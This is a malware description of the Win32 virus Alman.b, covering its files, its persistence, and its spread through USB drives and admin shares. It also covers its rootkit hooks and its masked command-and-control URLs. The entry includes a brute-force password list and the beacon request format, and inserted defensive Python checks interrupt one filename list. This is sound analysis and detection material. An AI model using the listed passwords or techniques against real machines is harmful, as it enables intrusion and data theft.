Virus.Win32.Alman.b
Detect: Virus.Win32.Alman.b
Platform: Win32
Type: Virus
Virus body size: ~38 KB
Summary
This is a virus that infects Windows PE executable (EXE) files.
Technical Details
Installation
When activated, the virus extracts a dynamic-link library (DLL) from its body into the Windows root directory under the name "linkinfo.dll":
%Windir%\linkinfo.dll
The file is 46592 bytes in size.
md5: 38FEE4EC44DF464D5C998629498D6176
In addition, it extracts the following driver from its body:
%System%\drivers\nvmini.sys
The driver is first written to a temporary file named "IsDrv118.sys":
%System%\drivers\IsDrv118.sys
The program is an NT kernel-mode driver, 17152 bytes in size.
md5: 01F4112EE9F2E11B8E952E4FF026B319
To load the driver, the virus registers a service named "nvmini" that is started automatically at each system boot:
[HKLM\SYSTEM\CurrentControlSet\Services\nvmini]
"DisplayName" = "NVIDIA Compatible Windows Miniport Driver"
"ImagePath" = "%System%\drivers\nvmini.sys"
"Group" = "Pointer Port"
"ErrorControl" = "0"
"Start" = "2"
"Type" = "1"
Propagation
The virus copies its executable to the root of every logical and removable drive under the name "boot.exe":
X:\boot.exe
md5: 54a821b720f0088789e3a98776c5fdd3
The virus then creates an "autorun.inf" file in the root directory of each drive:
X:\autorun.inf
This file runs the virus executable whenever the user opens the infected drive in Windows Explorer. Here X is the drive letter.
The virus sets the "hidden" attribute on all files it creates.
To infect files across the network, the virus attempts to connect to remote machines using the "Administrator" account and each of the following passwords:
password1
monkey
password
abc123
qwerty
letmein
root
mypass123
owner
test123
love
admin123
qwer
!@#$%^&*()
!@#$%^&*(
!@#$%^&*
!@#$%^&
!@#$%^
!@#$%
asdfgh
asdf
!@#$
654321
123456789
12345
Aaa
123
111
1
admin
Afterwards, it copies itself to the remote machine's administrative share as "setup.exe":
C$\setup.exe
File Infection
The virus injects the code of the "%Windir%\linkinfo.dll" library into the address space of the explorer.exe process. The injected code scans the available logical and network drives, as well as USB flash drives, for files that can be infected and infects them.
When infecting a file, the virus enlarges its last PE section, copies its encrypted body into the enlarged section, and then redirects the program's entry point to that body.
The virus infects all Windows (PE-EXE) executable files, except those with the following file names:
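The infection pattern just described (body appended to an enlarged last section, entry point redirected into it) can be triaged with a small PE header check. This is an added defender-side example, not code from the original description; it builds two constructed header-only PE32 images (a clean one and one shaped like an Alman victim) and flags an entry point that lands in the last section when that section is not a conventional code section or is writable and executable.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes

def build_pe(entry_rva, sections):
    """Build a header-only PE32 image (constructed test input, carries no real code)."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 60, 64)             # e_lfanew: PE header at offset 64
    coff = struct.pack("<IHHIIIHH", 0x4550, 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)                            # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)           # Magic = PE32
    struct.pack_into("<I", opt, 16, entry_rva)      # AddressOfEntryPoint
    hdrs = b"".join(struct.pack(SECTION_FMT, n, vs, va, rs, ro, 0, 0, 0, 0, fl)
                    for n, va, vs, ro, rs, fl in sections)
    return bytes(dos) + coff + bytes(opt) + hdrs

def parse_sections(data):
    """Return (entry_rva, [(name, virtual_addr, size, characteristics), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 60)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    entry_rva = struct.unpack_from("<I", data, pe + 24 + 16)[0]
    secs = []
    for i in range(nsec):
        n, vs, va, rs, _ro, _, _, _, _, fl = struct.unpack_from(SECTION_FMT, data, pe + 24 + opt_size + 40 * i)
        secs.append((n.rstrip(b"\0").decode("ascii", "replace"), va, max(vs, rs), fl))
    return entry_rva, secs

def entry_point_suspicious(data):
    """True if the entry point sits in the LAST section and that section is not .text or is RWX."""
    entry_rva, secs = parse_sections(data)
    for idx, (name, va, size, fl) in enumerate(secs):
        if va <= entry_rva < va + size:
            wx = bool(fl & IMAGE_SCN_MEM_WRITE) and bool(fl & IMAGE_SCN_MEM_EXECUTE)
            return idx == len(secs) - 1 and (name != ".text" or wx)
    return True  # entry point outside every section: malformed, treat as suspicious

# Constructed samples: (name, virtual_addr, virtual_size, raw_offset, raw_size, characteristics)
CLEAN = build_pe(0x1010, [(b".text", 0x1000, 0x400, 0x400, 0x400, 0x60000020),
                          (b".rsrc", 0x2000, 0x200, 0x800, 0x200, 0x40000040)])
INFECTED = build_pe(0x2100, [(b".text", 0x1000, 0x400, 0x400, 0x400, 0x60000020),
                             (b".rsrc", 0x2000, 0x9800, 0x800, 0x9800, 0xE0000040)])  # grown ~38 KB, RWX, EP moved
```

Packers and self-extracting installers also place the entry point in the last section, so treat a hit as a triage candidate to inspect, not a verdict.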
wooolcfg.exe
woool.exe
ztconfig.exe
patchupdate.exe
trojankiller.exe
xy2player.exe
flyff.exe
xy2.exe
au_unins_web.exe
cabal.exe
cabalmain9x.exe
cabalmain.exe
meteor.exe
patcher.exe
mjonline.exe
config.exe
zuonline.exe
userpic.exe
main.exe
dk2.exe
autoupdate.exe
dbfsupdate.exe
asktao.exe
sealspeed.exe
xlqy2.exe
game.exe
wb-service.exe
nbt-dragonraja2006.exe
dragonraja.exe
mhclient-connect.exe
hs.exe
mts.exe
gc.exe
zfs.exe
neuz.exe
maplestory.exe
nsstarter.exe
nmcosrv.exe
ca.exe
nmservice.exe
kartrider.exe
audition.exe
zhengtu.exe
System Infection Detection
The hidden driver can be detected with the GMER anti-rootkit tool.
Payload
To ensure that only one instance of it runs, the virus creates a unique identifier (mutex) with the following name:
PNP#DMUTEX#1#DL5
It terminates the processes of other malicious programs and deletes their files from the hard drive:
sxs.exe
lying.exe
logo1_.exe
logo_1.exe
fuckjacks.exe
spoclsv.exe
nvscv32.exe
svch0st.exe
c0nime.exe
iexpl0re.exe
ssopure.exe
upxdnd.exe
wdfmgr32.exe
spo0lsv.exe
ncscv32.exe
iexplore.exe
iexpl0re.exe
ctmontv.exe
explorer.exe
internat.exe
lsass.exe
smss.exe
svhost32.exe
rundl132.exe
msvce32.exe
rpcs.exe
sysbmw.exe
tempicon.exe
sysload3.exe
run1132.exe
msdccrt.exe
wsvbs.exe
cmdbcs.exe
realschd.exe
Files with these names are only terminated and deleted when they are not located in the following directories:
\WINNT\
\WINDOWS\
LOCAL SETTINGS\TEMP\
The virus retrieves a list of files to download from the Internet by visiting the following URL:
http://ftp.db***829.info/ok.gif
The URL was not responding at the time this description was written.
The virus downloads the files named in the list to the current user's temporary folder and then executes them.
It reports to the attacker the free space on the local disk (C:), the OS and Internet Explorer versions, and whether antivirus software is installed on the PC.
The information is sent as parameters of the following HTTP request to the attacker's server:
http://info.s***1.com/xxx.asp?action=post&HD=< free space percentage>&OT=<os version>&IV=<IE version>&AV=<drivers installed>
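The check-in request above has a distinctive shape (/xxx.asp with action=post plus the HD, OT, IV and AV parameters) that can be matched in web-proxy logs. This is an added detection example, not part of the original description; the log lines are constructed, and the C2 hostname is a placeholder because the page masks the real domain.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines (not from the original description).
# Format: "<epoch> <client-ip> <method> <url> <status>"
SAMPLE_LOG = """\
1180000001 10.0.0.7 GET http://www.example.com/index.html 200
1180000002 10.0.0.7 GET http://info.c2-placeholder.test/xxx.asp?action=post&HD=37&OT=5.1&IV=6.0&AV=0 404
1180000003 10.0.0.9 GET http://ftp.c2-placeholder.test/ok.gif 404
1180000004 10.0.0.7 POST http://mail.example.com/owa/?action=post&HD=1 200
"""

BEACON_KEYS = {"action", "HD", "OT", "IV", "AV"}   # parameter names from the advisory

def is_alman_beacon(url):
    """Match the check-in shape: path /xxx.asp, action=post, and all four host-profile keys."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/xxx.asp"):
        return False
    qs = parse_qs(parts.query)
    return BEACON_KEYS.issubset(qs) and qs["action"] == ["post"]

def find_beacons(log_text):
    """Return one record per matching request, with the victim profile the virus leaked."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue                      # skip malformed lines
        client, url = fields[1], fields[3]
        if is_alman_beacon(url):
            qs = parse_qs(urlsplit(url).query)
            hits.append({"client": client, "host": urlsplit(url).hostname,
                         "free_pct": qs["HD"][0], "os": qs["OT"][0],
                         "ie": qs["IV"][0], "av": qs["AV"][0]})
    return hits
```

A hit identifies an infected client worth isolating; the ok.gif fetch on its own is too generic a path to alert on by itself.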
The virus can also fetch an updated copy of itself from the attacker's site, which it saves under the name "AcLue.dll" in the following directory:
%WinDir%\AppPatch\AcLue.dll
Using the "%System%\drivers\nvmini.sys" driver, the virus hides the following files:
nvmini.sys
linkinfo.dll
autorun.inf
boot.exe
The driver also blocks deletion of the registry key that runs the "nvmini" service and blocks loading of drivers with the following names:
ISPUBDRV
ISDRV1
RKREVEAL
PROCEXP
SAFEMON
RKHDRV10
NPF
IRIS
NPPTNT
DUMP_WMIMMC
SPLITTER
EAGLENT
The driver replaces the handlers (service routines) of the following functions in the KeServiceDescriptorTable:
NtDeleteKey
NtDeleteValueKey
NtEnumerateKey
NtQueryDirectoryFile
NtLoadDriver
The virus installs system notification routines that prevent processes from loading the following DLLs:
UPXDHND.DLL
CMDBCS.DLL
WSVBS.DLL
MDDDSCCRT.DLL
RUND11.DLL
LGSYM.DLL
RDSHOST.DLL
RDFHOST.DLL
RDIHOST.DLL
RPCS.DLL
NOTEPAD.DLL
DLLHOSTS.DLL
WINDHCP.DLL
RICHDLL.DLL
DLLWM.DLL
Removal Recommendations
- Delete the registry key:
  [HKLM\SYSTEM\CurrentControlSet\Services\nvmini]
  "DisplayName" = "NVIDIA Compatible Windows Miniport Driver"
  "ImagePath" = "%System%\drivers\nvmini.sys"
  "Group" = "Pointer Port"
  "ErrorControl" = "0"
  "Start" = "2"
  "Type" = "1"
- Delete the following files:
  %Windir%\linkinfo.dll
  %System%\drivers\nvmini.sys
  %System%\drivers\IsDrv118.sys
  X:\boot.exe
  X:\autorun.inf
  C$\setup.exe
  %WinDir%\AppPatch\AcLue.dll
- Delete all copies of the virus from the hard drive.
- Run a full scan of your computer using an antivirus program with an up-to-date definition database (for example, Ad-Aware Free).
Note that while the "nvmini" driver is loaded it hides these files and blocks deletion of the service key (see Payload above), so the driver must be stopped before the key and files can be removed.